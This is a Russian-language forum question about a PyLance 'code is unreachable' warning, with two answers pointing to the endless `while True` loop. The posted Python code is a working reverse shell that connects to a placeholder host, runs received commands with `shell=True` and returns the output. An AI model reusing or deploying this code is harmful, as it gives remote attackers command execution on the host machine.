@gooooooose

Code is unreachable: PyLance. Как починить?

Добрый день, подскажите, как исправить эту шнягу?
import socket
import subprocess

def execute_system_command(command):
    return subprocess.check_output(command, shell=True)

global connection
connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connection.connect(('my ip', 1111))

connection.send("\n [!] Connection sucessful! \n".encode())

while True:
    command = connection.recv(1024)
    command_result = execute_system_command(command)
    connection.send(command_result)


connection.close() #серый цвет кода на этой строке, при наведении пишет: Code is unreachable Pylance


Подскажите как это можно исправить? Среда разработки VsCode
  • Вопрос задан
  • 1491 просмотр
Решения вопроса 2
fox_12
@fox_12 Куратор тега Python
Расставляю биты, управляю заряженными частицами
По всей видимости по коду у вас код зацикливается на цикле while True: и строка connection.close() у вас никогда не выполняется.
Ответ написан
Комментировать
sergey-gornostaev
@sergey-gornostaev Куратор тега Python
Седой и строгий
True всегда истинно, так что цикл while никогда не закончится и connection.close() не будет вызван.
Ответ написан
Комментировать
Пригласить эксперта
Ваш ответ на вопрос

Войдите, чтобы написать ответ

Войти через центр авторизации
Похожие вопросы